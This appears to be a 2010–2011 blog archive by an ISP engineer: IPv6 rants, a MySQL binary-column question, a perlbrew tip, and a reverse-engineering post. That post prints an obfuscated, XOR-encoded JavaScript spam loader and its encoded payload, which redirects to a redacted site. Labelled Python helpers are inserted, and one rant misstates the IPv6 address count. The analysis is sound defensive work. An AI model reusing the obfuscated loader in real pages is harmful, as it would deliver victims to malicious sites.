Thursday, March 17, 2011

"IPv6 no cause for alarm" - Melvyn Wray, 2011

My response to this article by idiot Melvyn Wray.


I hope you aren't paid to write for this website.  If so, you need to be fired immediately.

2000 wasn't a meltdown because corporations the world over spent BILLIONS on their software and infrastructure.  The company for which I was working at the time started hiring contract programmers in 1994 and still crossed their fingers hoping it would be enough time to audit and rewrite millions of lines of code.

My current company has allocated around $10 million dollars in infrastructure over the next couple of years.  As an ISP, you'd think we'd be able to find SOMEONE with a turnkey solution to give us a smooth ipv6 migration path.  Instead, despite the imminence of ipv6, we're starting to feel like pioneers in the industry, a position that we do not desire in the least.  For example, there are currently NO vendors offering a full-featured large scale nat solution to buy us some time to get fully underway with ipv6.  When you ask any of them about PCP, you're met with blank stares or "why would anyone want to do that?"  Granted, the initial draft of the IETF document was written only a month or so ago, ( https://datatracker.ietf.org/doc/draft-ietf-pcp-base/ ) but it should not be the burden of us as the customer to explain why this is critical to a vendor who is boasting that they have the best LSN solution.

The burden is on us to come up with a solution that allows our customers to access both ipv6 addresses as well as ipv4 addresses for at least the next decade.  I'd ask you to think of the ramifications of that task, but you're not capable.  Suffice it to say, for the foreseeable future, access to both ipv4 and ipv6 is mission critical.

Every single piece of hardware serving customers is affected.  Every cable modem earlier than docsis 3.0 needs to eventually be replaced. Every cable tv set top box will eventually need to be replaced.  Not only does the cable modem need to be replaced, we're discussing the very real possibility of having to put a nat/fw at each customer premises.  The reason for this?  If, today, you walk into your local Staples, Best Buy, Dixon's, or Curry's, *almost none* of their devices are fully ipv6 capable.  Are you the one who is willing to tell the customer that, sure, your Roku, Tivo, Slingbox, Kindle, iPod, wifi Galaxy Tab, Xbox, Wii, Airport Extreme, and Magic Jack will all definitely work with ipv6?  You'd bet your paycheck on it?

Every one of our servers needs some attention because even the most recent 5.x version, Red Hat Enterprise and their glorious patch hostage business model is *STILL* based on linux kernel 2.6.18, which has some ipv6 related weaknesses.  Every piece of software that serves our customers needs at least some rewriting, especially with regards to anti-spam.  There is very little in the way of good, solid support for ipv6 blacklists.  The author of rbldnsd, for example, just committed some early support for ipv6 in his code a little over a week ago.  It's just enough to get us some working blacklist functionality.

Many of the most expensive pieces of our core networking infrastructure need to be replaced.  While Cisco may have stamped "ipv6 ready" on the side of much of their gear, the act of turning on ipv6 support nearly brings the box to its knees.  The reason is that instead of each line card being capable of hardware flows that require very little interaction with the supervisor engine, ipv6 is implemented in software only, so suddenly every single packet needs to be sent to the supervisor card for handling.  This alone may cost us millions.  We're by no means a Cisco-only shop, so we're hoping that our testing doesn't reveal too many more surprises like this.

And you've obviously been reading nothing but puff pieces regarding ipv6 and security.  While it has a small number of nice features, it offers not one single bit of increased security that should cause ANYONE to breathe easier.  If anything, it should stress people out even more.  We're going to be finding fundamental flaws in the handling of ipv6 for years to come.  As recently as a couple of years ago, I discovered a critical flaw with the version of glibc that openSUSE was using at the time and its handling of AF_INET, AF_INET6, and AF_UNSPEC.  It was easily missed because this flaw only surfaced when interacting with oddly behaving DNS servers and so only affected, at best, 1% of their userbase.  To my knowledge, no one ever figured out the entire cause in any sort of forensic detail, and it was eventually fixed.

This also glosses over a very serious shortcoming in ipv6 which none of the original designers are willing to admit.  The problem is that ipv6 was designed in the early to mid 90's, when nat didn't even exist.  While the designers lauded themselves for guaranteeing that everything could have a public, internet facing ip address, they forgot to take into consideration whether or not everything *should* have a public, internet facing ip address.  Do you think the hackers at the recent Pwn2Own conference were balked in any way by ipv6?  Do you think the recent, critical icon vulnerability in Windows is in any way stopped by ipv6?  Does the display of a favicon.ico file that exploits this vulnerability somehow become subverted because it was loaded from an ipv6 website?  Using nat provides a fundamental level of security that truly makes the internet a safer place.  Insisting, even despite proof to the contrary, that every device should be accessible via the internet is just plain wrong, no matter how many PhDs can't get their own heads out of their asses.

All you're aware of is the little bit of a golf ball sized chunk of ice that you've been able to perceive.  The reality of the iceberg underneath is absolutely cause for alarm.  Keep your finger pointing and chicken little accusations to yourself and let the big boys who do the real work take care of business.

Here's to your writing success in a field other than technology.

#EPIC #FAIL

Monday, March 14, 2011

Anyone used mysql with 128-bit binary strings? Riddle me this...

I was doing a little experimentation wielding ipv6 with perl and mysql:

So, given this table schema:

mysql> desc binary_i;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| ip    | binary(255)      | NO   |     | NULL    |                |
| mask  | binary(255)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+
3 rows in set (0.00 sec)

Can anyone explain this??

Show a row:

mysql> select * from binary_i limit 1\G
*************************** 1. row ***************************
  id: 1
  ip: 00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101
mask: 11111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000000
1 row in set (0.00 sec)

Copy the ip value from that into a select statement:

mysql> select * from binary_i where ip = '00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101';
Empty set (0.01 sec)

Empty??

Try again with double quotes:

mysql> select * from binary_i where ip = "00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101";
Empty set (0.01 sec)

Still Empty??

Try it as a like statement with preceding and succeeding % symbols:

mysql> select * from binary_i where ip like '100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101%' limit 1;
+----+----------------------------------------------------------------------------------------------------------------------------------------
| id | ip
+----+----------------------------------------------------------------------------------------------------------------------------------------
|  1 | 00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101
+----+----------------------------------------------------------------------------------------------------------------------------------------
1 row in set (0.00 sec)

Success.  Using the same string as I did in the previous WHERE clauses. I'd be a lot less baffled if I weren't COPY and PASTING the binary string directly from an existing entry in the db.
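For what it's worth, here is an added Python model (not the post's Perl, and not a MySQL query) of why the exact-match queries above come back empty: MySQL right-pads a BINARY(255) value with 0x00 bytes to 255 bytes on insert and compares every byte, so a 128-byte literal never equals the stored row, while LIKE 'value%' only has to match the prefix. It also shows the 16-byte packed form from the ipaddress module, which fits a BINARY(16) column, and a prefix test on it; the 2001:db8:: addresses are constructed samples.

```python
import ipaddress

COLUMN_WIDTH = 255   # binary(255), as in the post's schema


def mysql_binary_store(value: bytes, width: int = COLUMN_WIDTH) -> bytes:
    """What BINARY(N) keeps: the value right-padded with 0x00 to N bytes."""
    if len(value) > width:
        raise ValueError("value longer than column")
    return value.ljust(width, b"\x00")


def binary_equals(stored: bytes, literal: bytes) -> bool:
    """BINARY '=' compares all N bytes, padding included."""
    return stored == literal


def binary_like_prefix(stored: bytes, literal: bytes) -> bool:
    """LIKE 'literal%' needs only the leading bytes to match."""
    return stored.startswith(literal)


def ip_as_bits(addr: str) -> bytes:
    """The post's representation: 128 ASCII '0'/'1' characters."""
    return format(int(ipaddress.IPv6Address(addr)), "0128b").encode()


def ip_packed(addr: str) -> bytes:
    """Compact alternative: the 16 raw bytes, suitable for a BINARY(16) column."""
    return ipaddress.IPv6Address(addr).packed


def in_prefix(packed_ip: bytes, packed_net: bytes, prefix_len: int) -> bool:
    """Prefix test on packed values: (ip & mask) == (net & mask)."""
    mask = ((1 << prefix_len) - 1) << (128 - prefix_len)
    ip = int.from_bytes(packed_ip, "big")
    net = int.from_bytes(packed_net, "big")
    return ip & mask == net & mask


def demo():
    # Constructed row (documentation prefix), kept the way binary(255) keeps it.
    addr = "2001:db8:1:2::55"
    bits = ip_as_bits(addr)
    stored = mysql_binary_store(bits)
    return {
        "equals": binary_equals(stored, bits),           # False: 127 trailing NULs differ
        "like": binary_like_prefix(stored, bits),        # True
        "equals_padded": binary_equals(stored, mysql_binary_store(bits)),  # True
        "packed_len": len(ip_packed(addr)),              # 16
        "in_prefix": in_prefix(ip_packed(addr), ip_packed("2001:db8:1:2::"), 64),
    }


if __name__ == "__main__":
    print(demo())
```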

Monday, December 13, 2010

Today has been one of those days...

It's been one of those days where it just feels as if there's been...  a disturbance in the force.  Not the extinguishing of millions of outcrying voices, more the subtle murmur of apology from the pickpocket who just accidentally bumped into you.

It started this morning.  My BlackBerry notifies me that it can no longer access my gmail account.  I log in from my laptop and it claims there has been suspicious activity with my account and I must enter my cell phone number to proceed with account revalidation.  I do, change my password, and successfully access my gmail account.  I hit the page where Google logs ip addresses used for accessing my gmail account and see nothing untoward.  My laptop from home and work, my BlackBerry, and nothing more.  When my wife's gmail account was hacked last month, it clearly showed an ip address from China, so the event was fresh in my mind and I knew exactly what the suspicious activity would look like.  (Unfortunate that Google didn't disable her account in a similar fashion to how mine was disabled before her account was used to send messages to her entire addressbook containing a malicious link.)  Presumably, Google has just today tightened security up a bit more. Since my BlackBerry uses BIS to hit gmail, it appears as if the connection is coming from a Canadian ip address, thousands of miles from my current location.  This seems the likely culprit of the suspicious activity.  I was due for a password change anyway and LastPass generates beautiful ones.  No harm, no foul.

Next, a message from my wife.  She asks about a small charge appearing on our account from a bookstore in Colorado.  Mental red flag is on its way back up even before it's come all the way back down from the last incident.  Start investigating, turns out it was just a book my wife ordered through the local school book fair, which is operated by a company in CO.  No harm, no foul.

Enter Twitter.  LastPass, which normally does a fine job of handling Twitter logins automatically, balks.  Invalid password.  W. T. F.  The red flag goes up like it was tied to the camel of a radical middle eastern zealot running late for a good stoning.  I log in and start analyzing my account for wrongdoing.  I notice the password it attempted to use was the wrong one.  My wanton use of LastPass anywhere and everywhere across all my operating systems, (Linux, Win7, WinXP, BlackBerry) and all the browsers I use regularly, (Chrome dev, Chrome canary, Firefox 4, Safari, Opera 10, Opera 11, occasionally IE9), caused a little bit of a sync problem when last I changed my twitter password.  No harm no foul.

Just for the sake of giving my red flag a rest, I went and changed several of my important passwords and wanted to take the time to encourage you to do the same.  Lifehacker has posted this handy guide in response to the Gawker hack that occurred recently.  Take a moment to read through it and give your passwords and accounts a good once-over.  Lifehacker: How to Audit and Update Your Passwords

Friday, October 29, 2010

Quick tip for openSUSE users of App::perlbrew...

Ever since I installed 11.2 on my ultra40 a few months ago, perlbrew has been busted for me.  After failing, the build log always ended with:

ODBM_File.xs:124: error: too few arguments to function ‘dbmclose’

I finally took the trouble to fix it.  After some googling, I saw that others on opensuse had seen this while compiling on their own, but didn't readily see any search results for how to easily fix it with an automated builder like perlbrew.  Turns out the secret sauce isn't that difficult, since perlbrew will happily pass through any perl building arguments:

perlbrew install perl-5.12.2 -D noextensions=ODBM_File

Monday, September 27, 2010

Teh maths is fun... (ipv6 rant)

My company just got its ipv6 allocation.  They gave us a /32.  Let's walk through this math for those of you watching from home.

/32 is the number of bits.  The full length of an ipv6 address is 128 bits.  Represented in binary, this means that the highest possible number is all 1's, for a total of 128 of them:

11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

To convert this number into decimal, you start way over at the right, and continuously increment by the powers of 2.  The first position is 1, the second is 2, the third is 4, the fourth is 8, the fifth is 16, the sixth is 32, and so on and so forth.  If you bother to follow those powers of two all the way out to 128 bits, you end up with a really big number.  170,141,183,460,469,000,000,000,000,000,000,000,000 to be exact.  This is the maximum number of ip addresses able to be assigned out of the ipv6 pool.

Our allocation of a /32 means that, starting from the left, you count out 32 binary bit positions and flip them to a 1, and the remaining 96 binary positions are all 0.  This gives us a total allocation of 79,228,162,514,264,300,000,000,000,000 ip addresses.  If you were to write me a check giving me a dollar for every one of our ip addresses, you'd need a check that was about 3 feet wide so that you could write out the number in english.  You'd be writing me a check for seventy-nine octillion, two hundred twenty-eight septillion, one hundred sixty-two sextillion, five hundred fourteen quintillion, two hundred sixty-four quadrillion, three hundred trillion dollars.

So, my company has personally been given enough ipv6 addresses to assign every single cell in your body well over 1 quadrillion ip addresses.  Every. Single. Cell.

From what I've been hearing, this is the norm.  They gave one guy a /48 for his websites, of which he has a small handful.  One septillion ip addresses.  For a few websites.

Let's extrapolate that our /32 is the norm for anyone needing more than a handful of ip addresses.  Divide the biggest possible 128 bit number by our /32 allocation.

  170,141,183,460,469,000,000,000,000,000,000,000,000
÷  79,228,162,514,264,300,000,000,000,000
= 2,147,483,648

That's the kind of number you don't need any help spelling out.  A little better than 2 billion.  How many ipv4 addresses are there?  Double that.  4 billion, though the way ipv4 has been carved up means that substantially less than that is usable.
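An added check, not from the post, that carries the prefix arithmetic through in exact integers, including the 16-million-address /8 blocks of the ipv4 space. Note that the all-ones 128-bit value is 2^128 - 1, roughly 3.4 x 10^38 and twice the figure quoted above, which makes the number of /32 blocks 2^32, the same as the number of ipv4 addresses rather than half of it; the documentation prefix 2001:db8::/32 and the body-cell count are assumptions.

```python
import ipaddress

IPV6_BITS = 128
IPV4_BITS = 32


def max_value(total_bits=IPV6_BITS):
    """All bits set: the highest address value, 2**bits - 1."""
    return (1 << total_bits) - 1


def addresses_in_prefix(prefix_len, total_bits=IPV6_BITS):
    """Addresses inside one /prefix_len block (the remaining host bits are free)."""
    return 1 << (total_bits - prefix_len)


def blocks_in_space(prefix_len, total_bits=IPV6_BITS):
    """How many distinct /prefix_len blocks the whole address space holds."""
    return (1 << total_bits) // addresses_in_prefix(prefix_len, total_bits)


def per_cell(prefix_len, cells=37_000_000_000_000):
    """Addresses per body cell; 3.7e13 cells per human is an assumed estimate."""
    return addresses_in_prefix(prefix_len) // cells


def summary():
    # 2001:db8::/32 is the documentation prefix, standing in for the post's /32.
    ours = ipaddress.IPv6Network("2001:db8::/32")
    return {
        "max": max_value(),                              # 2**128 - 1
        "slash32": addresses_in_prefix(32),              # 2**96
        "slash32_lib": ours.num_addresses,               # cross-check via ipaddress
        "slash48": addresses_in_prefix(48),              # 2**80, ~1.2 septillion
        "slash32_blocks": blocks_in_space(32),           # 2**32
        "ipv4_total": addresses_in_prefix(0, IPV4_BITS), # 2**32
        "ipv4_slash8": addresses_in_prefix(8, IPV4_BITS),# 16,777,216
        "per_cell": per_cell(32),                        # > 1 quadrillion
    }


if __name__ == "__main__":
    for name, value in summary().items():
        print(f"{name:>14}: {value:,}")
```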

It took us 30 years to approach exhaustion of the ipv4 space, though the last 15 years has seen such an exponential increase, the first 15 years is nothing but a drop in a bit-bucket in comparison.

I've argued repeatedly that there's so much ipv4 space that is absolutely WASTED that there really isn't that much of a crunch if they started enforcing utilization standards.  MIT, for example, has 16 million public ipv4 addresses of their very own.  Why?  Because, when it was allocated to them so many years ago, they could get away with it.  16 million.  For a college.  Do they need 16 million publicly facing ip addresses?  NO.

And, of course, there's no place like 127.0.0.1 is there?  Another 16 MILLION ip addresses wasted on localhost.  Why?  Because back when it was assigned, they could.  Who cares, right?  When there's 4 billion addresses, what's 16 million here or there, just between friends?

Xerox, 16 million.  HP, 16 million.  Ford, 16 million.  Halliburton, 16 million.  Prudential, 16 million.  Merck, 16 million.

Do any of these companies need 16 million publicly facing ipv4 addresses?   NO.  That's over 83 million ip addresses wasted right there.  Yes, HP recently purchased a company that produced cell phones.  Do those cell phones need PUBLIC ipv4 addresses?  NO.  The specifics of the wastefulness of the ipv4 space are a separate rant, though.

My point is that this pattern of wastefulness is not only continuing with ipv6, it's getting much, much WORSE.  Insanely sized allocations to anyone who asks for a few ips?  Really?  What good is having this seemingly vast amount of address space, if (going back to the handful of websites example) the wastefulness of this space increases by not 1 or 2 or 10, but TWENTY-FIVE orders of magnitude?

The view from this boat looks a lot like it did 30 years ago.

Friday, September 24, 2010

More weaponized javascript email attachments reverse engineered...

My reverse engineering of the latest rash of spam attachment scripts:

use strict;
use warnings;

use URI::Escape;


my $js =  '%66%75%6E%63%74%69%6F%6E%20%65%5F%65%28%65%29%7B%65%3D%75%6E%65%73%63%61%70%65%28%65%29%3B%70%3D%22%54%4F%45%4D%50%4A%5A%4D%4C%4B%50%51%42%4E%42%22%3B%73%3D%22%22%3B%73%6C%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6B%3D%30%2C%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%65%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%65%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%7B%63%3D%63%5E%70%2E%63%68%61%72%43%6F%64%65%41%74%28%6A%25%70%2E%6C%65%6E%67%74%68%29%3B%6A%2B%2B%3B%7D%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%73%6C%5B%6B%2B%2B%5D%3D%73%3B%73%3D%22%22%7D%7D%73%3D%73%6C%2E%6A%6F%69%6E%28%22%22%29%2B%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D';


print uri_unescape( $js );
print "\n";

# the $js string decodes to a function named e_e:
#    function e_e(e){e=unescape(e);p="TOEMPJZMLKPQBNB";
#    s="";sl=new Array(),k=0,j=0;for(i=0;i<e.length;i++){c=e.charCodeAt(i);if(c<128){c=c^p.charCodeAt(j%p.length);j++;}
#    s+=String.fromCharCode(c);if(s.length>80){sl[k++]=s;s=""}}s=sl.join("")+s;document.write(s)}

# My bad perl reproduction...
#
sub e_e {

    my $string = shift;
    my $e = uri_unescape($string);

    my $p = "TOEMPJZMLKPQBNB";

    my $s = "";

    my @sl;
    my $k = 0;
    my $j = 0;

    my @split = split( //, $e );
    my @psplit = split( //, $p );

    for( my $i = 0; $i < length( $e ); $i++ ){

        my $c = ord($split[$i]);

        if ( $c < 128 ) {
            my $result = $psplit[$j % length($p)];
            $c = $c ^ ord( $result );
            $j++;
        }

        $s .= chr($c);

        if( length($s) > 80 ) {
            $sl[$k++] = $s;
            $s = "";
        }
    }

    # s = sl.join("")+s;  the saved 80-char chunks come first, then the remainder
    $s = join( '', @sl ) . $s;

    print $s;
    print "\n";

}

#This string is passed to the e_e:
e_e('ts%28%28%24%2Bz%258? |%27?7%3D9xo%22%2F%3C?%2988sb%2D%2D%3A%3B #%24wx%7Dw%3E%22%3D%7F&6 ?%7Fb%7F%3E2%28*9?%3C#%27%2C1%3Dk%2E?%27u|b#%24%3C%2Elb%7Bqem%5D@WGp?13%2E%2Bb#&!98wx||%7Busb%2C%2D&%2B ?mhjorw%24#b%2C%257 %29%22%22wxny~fgzv%60t%2E%29%247%24go%2F%2E%3E%25%27%3C%60js1%29nv%3Bm%24957%7Fl* %3B5w%7Fe%2D%3A%3Be %24%2E%221%3B%291c3%257b%24?%3D%3D2!51%3Dk%25%24%27xsp%2D??6n%245%2C pr^K%28%24%2D%27|q%0A%2B%2E%22*1%243%2Bvm?*%3E%22o%3D%27&&#op%295!#9msa^H^D^R                                                        ^C^Krj%29%246%2Emso%7F%60j^[%2D%24#j%0D%28%2Ek0%25%2Bb#%2E6m 859%29%28%244&n %2Do%0D^Y^]^F%0A%22%3B%2E%22%7Dbn^A8&&&p%22??%29k%24%3Eb^\%273&6958fb*                        %24%3E%25|rm5qyb%24%2Edqc?%22o~a65%2D%29%28nGP');

# produces a metarefresh to http://XXXXthefromainerXXXX.com
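As an added triage helper (Python, not the post's Perl and not the spammer's code), the following recovers the XOR key from the percent-encoded loader instead of hard-coding it, checks for the loader's XOR-loop signature first, and then applies the key to the argument the same way e_e() does. The loader text is the one decoded above; the argument fed to it here is a constructed harmless sample, not the spam payload.

```python
import re
from urllib.parse import quote, unquote

# The e_e() loader as decoded from the post's $js string; used here only to
# build a sample stub, so the key-recovery path runs on realistic input.
LOADER_JS = ('function e_e(e){e=unescape(e);p="TOEMPJZMLKPQBNB";s="";'
             'sl=new Array(),k=0,j=0;for(i=0;i<e.length;i++){c=e.charCodeAt(i);'
             'if(c<128){c=c^p.charCodeAt(j%p.length);j++;}s+=String.fromCharCode(c);'
             'if(s.length>80){sl[k++]=s;s=""}}s=sl.join("")+s;document.write(s)}')

KEY_RE = re.compile(r'p="([^"]+)"')                      # the key literal
XOR_LOOP_RE = re.compile(r'charCodeAt\(j%p\.length\)')   # the XOR-loop signature


def js_unescape(text):
    """JavaScript unescape(): each %XX becomes one code unit, i.e. Latin-1."""
    return unquote(text, encoding="latin-1")


def recover_key(escaped_stub):
    """Decode a %XX-escaped loader and return its repeating XOR key, or None."""
    js = js_unescape(escaped_stub)
    if not XOR_LOOP_RE.search(js):
        return None
    m = KEY_RE.search(js)
    return m.group(1) if m else None


def xor_decode(escaped_arg, key):
    """The transform e_e() applies: unescape, then XOR ASCII chars with the key."""
    out, j = [], 0
    for ch in js_unescape(escaped_arg):
        c = ord(ch)
        if c < 128:                 # non-ASCII code units pass through untouched
            c ^= ord(key[j % len(key)])
            j += 1
        out.append(chr(c))
    return "".join(out)


def triage(escaped_stub, escaped_arg):
    """Recover the key from the stub and decode the argument with it."""
    key = recover_key(escaped_stub)
    return None if key is None else xor_decode(escaped_arg, key)


def xor_encode(plain, key):
    """Inverse of xor_decode (XOR is symmetric); only used to construct samples."""
    return quote(xor_decode(quote(plain, safe=""), key), safe="")


# Constructed sample, not the spam payload: a harmless string wrapped the same way.
SAMPLE_KEY = "TOEMPJZMLKPQBNB"
SAMPLE_PLAIN = '<meta http-equiv="refresh" content="0;url=http://example.invalid/">'
SAMPLE_STUB = quote(LOADER_JS, safe="")
SAMPLE_ARG = xor_encode(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    print("key:", recover_key(SAMPLE_STUB))
    print("decoded:", triage(SAMPLE_STUB, SAMPLE_ARG))
```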